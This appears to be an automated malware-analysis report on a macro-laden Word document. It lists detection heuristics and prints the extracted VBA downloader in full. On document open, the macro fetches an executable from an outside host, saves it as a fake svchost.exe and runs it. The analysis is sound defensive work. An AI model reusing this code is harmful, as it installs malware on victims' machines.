MALICIOUS
470
Risk Score
Heuristics 12
-
ClamAV: Doc.Downloader.Sload-6961205-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
executionBegin = Shell(Management, windowStyle) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set wsh = VBA.CreateObject("WScript.Shell") -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal MicrosoftEssential As Long, ByVal OffensiveSecurity As String, ByVal _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsh = VBA.CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5755 bytes |
SHA-256: cc4f41ca8807aa38005ccc608bd11ba4594ce5135216b4aa329eb3f3369b786f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function Wikipedia Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal MicrosoftEssential As Long, ByVal OffensiveSecurity As String, ByVal _
ResidentEvilFour As String, ByVal PlayStationPortable As Long, ByVal NepalEighthWonderofWorld As Long) As Long
Private Sub Document_Open()
Dim TempStart As String
Dim TempColon As String
Dim TempSlash As String
Dim TempFirst As String
Dim TempSecond As String
Dim TempThird As String
Dim TempFourth As String
Dim TempFifth As String
Dim TempSixth As String
Dim FinalTemp As String
Dim Management As String
Dim WindowsOpen As String, ext As String
Dim buf, ret As Long
Dim LinkOne As String
Dim LinkTwo As String
Dim LinkThree As String
LinkOne = "http"
LinkTwo = "://talent2.es"
LinkThree = "/wp-includes/csss/loda.exe"
WindowsOpen = LinkOne + LinkTwo + LinkThree
buf = Split(WindowsOpen, ".")
ext = buf(UBound(buf))
TempStart = "C"
TempColon = ":"
TempSlash = "\"
TempFirst = "Users"
TempSecond = "Public"
TempThird = "Documents"
TempFourth = "svchost"
TempFifth = "."
TempSixth = "exe"
FinalTemp = TempStart + TempColon + TempSlash + TempFirst + TempSlash + TempSecond + TempSlash + TempThird + TempSlash + TempFourth + TempFifth + TempSixth
Management = FinalTemp
ret = Wikipedia(0, WindowsOpen, Management, 0, 0)
Dim wsh As Object
Set wsh = VBA.CreateObject("WScript.Shell")
Dim waitOnReturn As Boolean: waitOnReturn = True
Dim windowStyle As Integer: windowStyle = 1
Dim executionBegin
executionBegin = Shell(Management, windowStyle)
End Sub
' Processing file: /opt/analyzer/scan_staging/60f63d1660b24d0d99fdeded27efa02c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4068 bytes
' Line #0:
' LineCont 0x0008 07 00 02 00 14 00 04 00
' FuncDefn (Private Declare Function PlayStationPortable Lib "TempSlash" (ByVal NepalEighthWonderofWorld As Long, ByVal urlmon As String, ByVal Document_Open As String, ByVal TempStart As Long, ByVal TempColon As Long) As Long)
' Line #1:
' Line #2:
' FuncDefn (Private Sub TempFirst())
' Line #3:
' Line #4:
' Dim
' VarDefn TempSecond (As String)
' Line #5:
' Dim
' VarDefn TempThird (As String)
' Line #6:
' Dim
' VarDefn TempFourth (As String)
' Line #7:
' Dim
' VarDefn TempFifth (As String)
' Line #8:
' Dim
' VarDefn TempSixth (As String)
' Line #9:
' Dim
' VarDefn FinalTemp (As String)
' Line #10:
' Dim
' VarDefn Management (As String)
' Line #11:
' Dim
' VarDefn WindowsOpen (As String)
' Line #12:
' Dim
' VarDefn ext (As String)
' Line #13:
' Dim
' VarDefn buf (As String)
' Line #14:
' Dim
' VarDefn ret (As String)
' Line #15:
' Dim
' VarDefn LinkOne (As String)
' VarDefn LinkTwo (As String)
' Line #16:
' Dim
' VarDefn LinkThree
' VarDefn Split (As Long)
' Line #17:
' Dim
' VarDefn wsh (As String)
' Line #18:
' Dim
' VarDefn CreateObject (As String)
' Line #19:
' Dim
' VarDefn waitOnReturn (As String)
' Line #20:
' LitStr 0x0004 "http"
' St wsh
' Line #21:
' LitStr 0x000D "://talent2.es"
' St CreateObject
' Line #22:
' LitStr 0x001A "/wp-includes/csss/loda.exe"
' St waitOnReturn
' Line #23:
' Ld wsh
' Ld CreateObject
' Add
' Ld waitOnReturn
' Add
' St LinkOne
' Line #24:
' Ld LinkOne
' LitStr 0x0001 "."
' ArgsLd windowStyle 0x0002
' St LinkThree
' Line #25:
' Ld LinkThree
' FnUBound 0x0000
' ArgsLd LinkThree 0x0001
' St LinkTwo
' Line #26:
' LitStr 0x0001 "C"
' St TempSecond
' Line #27:
' LitStr 0x0001 ":"
' St TempThird
' Line #28:
' LitStr 0x0001 "\"
' St TempFourth
' Line #29:
' LitStr 0x0005 "Users"
' St TempFifth
' Line #30:
' LitStr 0x0006 "Public"
' St TempSixth
' Line #31:
' LitStr 0x0009 "Documents"
' St FinalTemp
' Line #32:
' LitStr 0x0007 "svchost"
' St Management
' Line #33:
' LitStr 0x0001 "."
' St WindowsOpen
' Line #34:
' LitStr 0x0003 "exe"
' St ext
' Line #35:
' Ld TempSecond
' Ld TempThird
' Add
' Ld TempFourth
' Add
' Ld TempFifth
' Add
' Ld TempFourth
' Add
' Ld TempSixth
' Add
' Ld TempFourth
' Add
' Ld FinalTemp
' Add
' Ld TempFourth
' Add
' Ld Management
' Add
' Ld WindowsOpen
' Add
' Ld ext
' Add
' St buf
' Line #36:
' Line #37:
' Ld buf
' St ret
' Line #38:
' LitDI2 0x0000
' Ld LinkOne
' Ld ret
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsLd PlayStationPortable 0x0005
' St Split
' Line #39:
' Line #40:
' Dim
' VarDefn executionBegin (As Object)
' Line #41:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' Ld Mac
' ArgsMemLd Shell 0x0001
' Set executionBegin
' Line #42:
' Dim
' VarDefn Document (As Boolean)
' BoS 0x0000
' LitVarSpecial (True)
' St Document
' Line #43:
' Dim
' VarDefn id_0262 (As Integer)
' BoS 0x0000
' LitDI2 0x0001
' St id_0262
' Line #44:
' Line #45:
' Dim
' VarDefn id_0264
' Line #46:
' Ld ret
' Ld id_0262
' ArgsLd id_0266 0x0002
' St id_0264
' Line #47:
' EndSub
' Line #48:
' Line #49:
' Line #50:
' Line #51:
' Line #52:
' Line #53:
' Line #54:
' Line #55:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.